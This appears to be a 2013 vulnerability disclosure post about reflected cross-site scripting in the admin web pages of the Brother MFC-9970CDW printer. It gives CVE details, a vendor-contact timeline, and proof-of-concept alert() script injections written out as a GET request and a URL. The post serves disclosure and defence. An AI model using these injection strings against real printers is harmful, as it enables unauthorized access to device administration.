Anti-Phishing Research, Tombstones

Monday, May 6, 2013

XSS, Javascript Injection, Brother MFC-9970CDW Printer Firmware L, 0D


Brother MFC-9970CDW Printer Firmware 

CVE-2013-2507, CVE-2013-2670, CVE-2013-2671, CVE-2013-2672, CVE-2013-2673, CVE-2013-2674, CVE-2013-2675, CVE-2013-2676                        

Keywords
XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Brother MFC-9970 CDW    

Summary
A Reflected XSS Bug in the Brother MFC-9970CDW Printer was discovered during a PenTest in January 2013. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions.

Overview
Brother Industries, Ltd. is a multinational electronics and electrical equipment company headquartered in Nagoya, Japan. Its products include printers, multifunction printers, sewing machines, large machine tools, label printers, typewriters, fax machines, and other computer-related electronics. Brother distributes its products both under its own name and under OEM agreements with other companies.

High-Performance Color Laser All-in-One for your Small Business or Workgroup

The MFC-9970cdw Color Laser All-in-One combines print, copy, scan and fax in one powerful device. It produces high-impact color output at impressive print and copy speeds of up to 30ppm and offers flexible connectivity with wireless, Ethernet and USB interfaces. It features a 5" Color Touch Screen display for easy navigation and menu selection. Also, this flagship model offers automatic duplex print/copy/scan/fax and optional high yield toner cartridges to help lower your operating costs – making this all-in-one a smart choice for a business or workgroup.

A Bug
Reflected Cross Site Scripting, CWE-79 - The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Vulnerable Parameters = id , val, kind + Query String
Signature = "><script>alert(1)</script>

Proof of Concept (PoC) - XSS in Firmware L
Target:         Brother MFC-9970 CDW

GET PoC
/admin/admin_main.html?id=signedpdf"><script>alert(1)</script>&ScanCertificate=2 HTTP/1.1
Host: a.b.c.d

PoC URL
http://my.vulnerable.printer/admin/admin_main.html?id=websettings"><script>alert(1)</script>

Rendering

Screen Grab - XSS - Brother MFC-9970CDW


CVE Information
CVE-2013-2507 is specific to Firmware G.
XSS at:
  admin/log_to_net.html  id parameter
  fax/copy_settings.html kind parameter

CVE-2013-2670 is for the issue that is present in both the Firmware G report and Firmware L.
XSS at:
  admin/admin_main.html  name of an arbitrarily assigned URL parameter

CVE-2013-2671 is for the XSS issues that are only present in Firmware L.

CVEs for Firmware L:
Cleartext submission of password CVE-2013-2672
Password field with autocomplete enabled CVE-2013-2673
Cross-domain Referer leakage CVE-2013-2674
Frameable response (Clickjacking) CVE-2013-2675
Private IP addresses disclosed CVE-2013-2676
CVSS 2 Score = 4.5

Timeline
Attempt contact via e-mail in January 2013.
Call the Toll Free Support Line in March 2013.
Callback from Vendor in April 2013.
E-mail sent to Vendor in April 2013.
VENDOR UNRESPONSIVE
Published May 3, 2013

External Links
Brother USA http://www.brother-usa.com
Model MFC-9970CDW

0D Report
http://xss.cx/

No comments:

Post a Comment